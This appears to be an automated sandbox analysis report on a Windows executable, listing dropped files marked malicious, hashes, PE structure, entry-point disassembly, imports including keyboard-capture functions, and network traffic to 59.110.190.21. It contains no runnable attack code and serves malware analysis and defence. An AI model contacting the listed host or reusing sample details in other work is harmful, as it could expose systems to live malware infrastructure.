                                    SHA1:C6EDF3993733369AC9D172E1B74EDCACC0B742B6
                                    SHA-256:51C25095ABB8FC1467CC7C4B1E5D881E77906C2B6B3ABD09B3ACAF07BBE4E9E5
                                    SHA-512:15019ACE23CBEAA5D3AC2A2787F1AA607A82BD36FED40F9CC475154424D757452161B24E7ED2ECFB9051BB542B563C50B79F271C56BB2CD3C4F69AFADF65DA25
                                    Malicious:false
                                    Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):122880
                                    Entropy (8bit):6.0020157606602025
                                    Encrypted:false
                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fi:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gi
                                    MD5:4C4877FDBD8F815C54AECA6FA3B7FE5F
                                    SHA1:FD7A367F93DCB22144EA2822F7133B094B75466E
                                    SHA-256:BB30DC22B2B3FFDB0BC7E90B1BF7569DCBAFA0C4305CD58A9CB70FBA7E36A22C
                                    SHA-512:33A094C5B340367D7396566DC73C1E2FD4FBF8F4B08A3E324E0C74127B655CF5D2913DB7E33A073F09B21C1D8C1392A17CEBC3695E3D3A0C9893A5FFCB04D949
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):28272
                                    Entropy (8bit):6.229055678527888
                                    Encrypted:false
                                    SSDEEP:384:G3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/L:GOUkgfdZ9pRyv+uPzCMHo3q4tDghl
                                    MD5:D6D5B86EE84CDA52CFE6082DE9DA3ED8
                                    SHA1:B00DEF32470E045E835BC649989B83E7539CFB3C
                                    SHA-256:0EACB70E2318A405BF459E466C148FCB544707080E2AA7762E8E8829547D31E9
                                    SHA-512:AE78E5C3ADE48015E20F6E413EC98FEAC046BA0C0B05EDD4C213AA80A4035616E226B346DA1287044543C670A41C8C804F5933C0C7225502FF4F7C9D700A9692
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):0.1029884613457865
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:149876985-734579485.05.exe
                                    File size:30'939'136 bytes
                                    MD5:d21ced168a5267499378453eee404703
                                    SHA1:29ac1c528970d1e2423deb11b5998a2eb7c0842b
                                    SHA256:419fbd9b877c7d0c7f9874b5a87b8f446fe599608731ac5b447acc74315e6a67
                                    SHA512:65ce64e21c04ff22a05a4f6c7c5e8b7907c49c110d7cc76b933b0a8b801dd22eb598b384f8fd07f4cc9b8cc715cf06f78e67e89b35f23d36e94d1097a7e534d7
                                    SSDEEP:6144:kxdVJksCr6RDFm2CDblp8VSZz27KcwiVTrG2Z:kx9GQvCDb79fcdfG2Z
                                    TLSH:6B677B06B3A460F6D036C579CDA36256F7B278254B6547CF0660CA2ADF237D2BE39311
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................8.X.......[...............................M.......J.......Z......._.....Rich............PE..d.....Qf..........#
                                    Icon Hash:d8ac2684e466bc99
                                    Entrypoint:0x14001653c
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6651ECA8 [Sat May 25 13:50:32 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:2
                                    File Version Major:5
                                    File Version Minor:2
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:2
                                    Import Hash:de4966736831656d2e43159e1e0b8528
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007F14C4C523E4h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007F14C4C3A75Ch
                                    int3
                                    int3
                                    dec eax
                                    mov dword ptr [esp+08h], ecx
                                    dec eax
                                    sub esp, 00000088h
                                    dec eax
                                    lea ecx, dword ptr [0001219Dh]
                                    call dword ptr [00005EEFh]
                                    dec esp
                                    mov ebx, dword ptr [00012288h]
                                    dec esp
                                    mov dword ptr [esp+58h], ebx
                                    inc ebp
                                    xor eax, eax
                                    dec eax
                                    lea edx, dword ptr [esp+60h]
                                    dec eax
                                    mov ecx, dword ptr [esp+58h]
                                    call 00007F14C4C54EDCh
                                    dec eax
                                    mov dword ptr [esp+50h], eax
                                    dec eax
                                    cmp dword ptr [esp+50h], 00000000h
                                    je 00007F14C4C4FC33h
                                    dec eax
                                    mov dword ptr [esp+38h], 00000000h
                                    dec eax
                                    lea eax, dword ptr [esp+48h]
                                    dec eax
                                    mov dword ptr [esp+30h], eax
                                    dec eax
                                    lea eax, dword ptr [esp+40h]
                                    dec eax
                                    mov dword ptr [esp+28h], eax
                                    dec eax
                                    lea eax, dword ptr [00012148h]
                                    dec eax
                                    mov dword ptr [esp+20h], eax
                                    dec esp
                                    mov ecx, dword ptr [esp+50h]
                                    dec esp
                                    mov eax, dword ptr [esp+58h]
                                    dec eax
                                    mov edx, dword ptr [esp+60h]
                                    xor ecx, ecx
                                    call 00007F14C4C54E8Ah
                                    jmp 00007F14C4C4FC14h
                                    dec eax
                                    mov eax, dword ptr [esp+00000088h]
                                    dec eax
                                    mov dword ptr [00012214h], eax
                                    dec eax
                                    lea eax, dword ptr [esp+00000088h]
                                    dec eax
                                    add eax, 08h
                                    dec eax
                                    mov dword ptr [000121A1h], eax
                                    dec eax
                                    mov eax, dword ptr [000121FAh]
                                    dec eax
                                    mov dword ptr [0001206Bh], eax
                                    Programming Language:
                                    • [ASM] VS2008 SP1 build 30729
                                    • [ C ] VS2005 build 50727
                                    • [IMP] VS2005 build 50727
                                    • [ C ] VS2008 SP1 build 30729
                                    • [C++] VS2008 SP1 build 30729
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 SP1 build 30729
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x22f480x8c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d920000x16d0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d910000xe04.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d940000x488.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x1c0000x7d8.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x1abee0x1ac00891377dbe3f943685d014a591c7cd98eFalse0.583883980724299data6.379817410240486IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x1c0000x88b20x8a00e5acd87b74d5bb39b04f039abb7e914dFalse0.37290534420289856data4.812112495830329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x250000x1d6b5e00x1d5ae00d7d68c5d0621e1e72bd42ee5ee185d1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x1d910000xe040x10000a3058f0bc5962580fb190e5121f56f4False0.469482421875data4.803769927328999IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x1d920000x16d00x1800d6a23045f4af048d53d3d17b6c9fc63eFalse0.28369140625data4.042062057986497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1d940000x7400x800f5b160400e6dfc47d85bf70f344bd6cfFalse0.43212890625GLS_BINARY_LSB_FIRST4.319333330336306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1d922100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.1881720430107527
                                    RT_ICON0x1d924f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.3344594594594595
                                    RT_ICON0x1d926200x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.11158536585365854
                                    RT_DIALOG0x1d92cb80xf2PGP symmetric key encrypted data - salted -EnglishUnited States0.5702479338842975
                                    RT_DIALOG0x1d92db00xbaPGP symmetric key encrypted data - salted -EnglishUnited States0.7580645161290323
                                    RT_GROUP_ICON0x1d92c880x30dataEnglishUnited States0.9166666666666666
                                    RT_VERSION0x1d92e700x2fcdataEnglishUnited States0.5
                                    RT_MANIFEST0x1d931700x559XML 1.0 document, ASCII text, with very long lines (1369), with no line terminatorsEnglishUnited States0.45361577794010227
                                    DLLImport
                                    KERNEL32.dllSetEnvironmentVariableW, CreateProcessW, FindNextFileW, SetFilePointer, GetEnvironmentVariableW, IsValidCodePage, CreateThread, Sleep, GlobalUnlock, GlobalLock, GlobalAlloc, TerminateThread, IsBadReadPtr, CopyFileW, CreateDirectoryW, GetFileAttributesW, GetFullPathNameW, LoadLibraryExW, ExpandEnvironmentStringsW, GetFileSize, CompareStringW, GetCurrentProcess, ExitProcess, GetCurrentThread, GetModuleHandleW, CreateFileW, WideCharToMultiByte, WriteFile, FindResourceExW, GlobalMemoryStatus, GetSystemInfo, CallNamedPipeW, SetLastError, HeapReAlloc, HeapFree, FindResourceW, SizeofResource, GetProcessHeap, HeapAlloc, LoadResource, LockResource, LoadLibraryW, GetLastError, GetMailslotInfo, LoadLibraryA, WaitForSingleObject, FindFirstFileW, FindClose, ReadFile, GetLocalTime, MultiByteToWideChar, GetCommandLineW, GetModuleFileNameW, FreeLibrary, CloseHandle, SetCurrentDirectoryW, GetUserDefaultLCID, GetVersionExW, AddVectoredExceptionHandler, GetTickCount, GetModuleHandleA, GetProcAddress, GetComputerNameW, GetStartupInfoW, CreateMailslotW, HeapSize, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, DeleteCriticalSection, GetFileType, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, RtlUnwindEx, FlsAlloc, GetCurrentThreadId, FlsFree, FlsSetValue, FlsGetValue, DecodePointer, EncodePointer, GetOEMCP, GetACP, GetCPInfo, HeapCreate, HeapSetInformation, GetModuleFileNameA, GetStdHandle, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoA, VirtualAlloc
                                    ADVAPI32.dllGetNumberOfEventLogRecords, CloseEventLog, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumValueW, GetUserNameW, GetUserNameA, OpenEventLogW
                                    GDI32.dllPathToRegion, BitBlt, SetTextAlign, SetBkColor, SetBkMode, CreateSolidBrush, SetTextColor, BeginPath, MoveToEx, SetPolyFillMode, GetCurrentPositionEx, EndPath, CreatePen, StrokePath, StrokeAndFillPath, GdiFlush, SelectObject, DeleteObject, DeleteDC, CombineRgn, CreateRectRgn, GetDeviceCaps, GetTextMetricsW, CreateFontIndirectW, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, TextOutW, GetTextExtentPoint32W
                                    SHELL32.dllShellExecuteW
                                    USER32.dllSetCursor, SetClassLongPtrW, SendMessageW, GetClientRect, GetFocus, SystemParametersInfoW, DialogBoxIndirectParamW, CreateDialogIndirectParamW, GetDesktopWindow, GetSysColor, ReleaseCapture, AppendMenuW, wsprintfA, CreatePopupMenu, GetMessagePos, GetWindowTextW, MessageBoxW, OpenClipboard, CloseClipboard, SetClipboardData, GetWindowThreadProcessId, GetMenuStringW, EnableWindow, DestroyMenu, DrawMenuBar, ModifyMenuW, GetSystemMenu, InsertMenuW, GetAsyncKeyState, MessageBoxA, GetActiveWindow, SetWindowTextW, GetKeyNameTextW, GetKeyboardState, GetDlgItem, EndDialog, EnumWindows, CallWindowProcW, SetWindowLongPtrW, SendDlgItemMessageW, GetDlgItemTextW, EmptyClipboard, AttachThreadInput, UpdateWindow, ShowWindow, MoveWindow, RegisterHotKey, IsZoomed, GetWindow, IsWindow, IsIconic, DestroyWindow, SetWindowPos, EnumChildWindows, IsWindowVisible, TrackPopupMenu, TranslateMessage, PeekMessageW, SetWindowLongW, WindowFromPoint, PostQuitMessage, SetCapture, DefWindowProcW, GetCursorPos, PtInRect, GetWindowLongW, GetParent, SendMessageTimeoutW, GetClassNameW, PostMessageW, SetWindowRgn, InvalidateRect, GetDC, GetWindowRect, ReleaseDC, EndPaint, FillRect, SetForegroundWindow, ClientToScreen, wsprintfW, FindWindowW, IsDialogMessageW, DispatchMessageW, GetMessageW, KillTimer, UnregisterHotKey, RegisterWindowMessageW, GetSystemMetrics, GetForegroundWindow, LoadIconW, LoadCursorW, RegisterClassW, CreateWindowExW, SetTimer, BeginPaint
                                    WINMM.dllsndPlaySoundW, waveOutSetVolume, waveOutGetVolume
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2025 13:47:29.787971973 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:29.788005114 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:29.788108110 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:29.812957048 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:29.812971115 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.158186913 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.158376932 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.159295082 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.159419060 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.219952106 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.219961882 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.220256090 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.220355988 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.222167969 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.263336897 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.588740110 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.588823080 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.588884115 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.588911057 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.595220089 CET49902443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.595242023 CET4434990259.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.700254917 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.700320005 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:31.700422049 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.700711966 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:31.700736046 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.587485075 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.587569952 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.588104010 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.588124990 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.588325977 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.588337898 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.949580908 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.949608088 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.949671030 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.949706078 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.949719906 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.949758053 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.952368975 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.952456951 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.953988075 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.954063892 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:33.955770016 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:33.955837011 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.041731119 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.041842937 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.042062998 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.042109013 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.042181015 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.042490959 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.042521954 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.042551041 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.042571068 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.042607069 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.042623043 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.044037104 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.044195890 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.044255972 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.044351101 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.046355009 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.046509027 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.047966957 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.048043966 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.050142050 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.050234079 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.050270081 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.050327063 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.133928061 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.134037018 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.134165049 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.134223938 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.134414911 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.134462118 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.134876966 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.134912014 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.134932041 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.134942055 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.134969950 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.134998083 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.135713100 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.135744095 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.135765076 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.135771036 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.135811090 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.136297941 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.136359930 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.136457920 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.136512041 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.136948109 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.137022972 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.137155056 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.137223005 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.138614893 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.138674974 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.138694048 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.138744116 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.140283108 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.140342951 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.142355919 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.142416000 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.383603096 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.383652925 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.383683920 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.383748055 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.383764982 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.383783102 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.383812904 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.383863926 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.556320906 CET49916443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.556355000 CET4434991659.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.668874979 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.668915033 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:34.669004917 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.669395924 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:34.669409990 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:35.978301048 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:35.978401899 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:35.978939056 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:35.978944063 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:35.979182005 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:35.979187012 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.328207970 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.328264952 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.328306913 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.328325033 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.328336000 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.328382015 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.329976082 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.330073118 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.332237959 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.332318068 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.334935904 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.335007906 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.418395996 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.418458939 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.418512106 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.418524027 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.418549061 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.418565035 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.418947935 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.419008017 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.419611931 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.419671059 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.420541048 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.420597076 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.420620918 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.420670986 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.422822952 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.422898054 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.424985886 CET4434993059.110.190.21192.168.2.4
                                    Jan 13, 2025 13:47:36.425057888 CET49930443192.168.2.459.110.190.21
                                    Jan 13, 2025 13:47:36.425101042 CET4434993059.110.190.21192.168.2.4
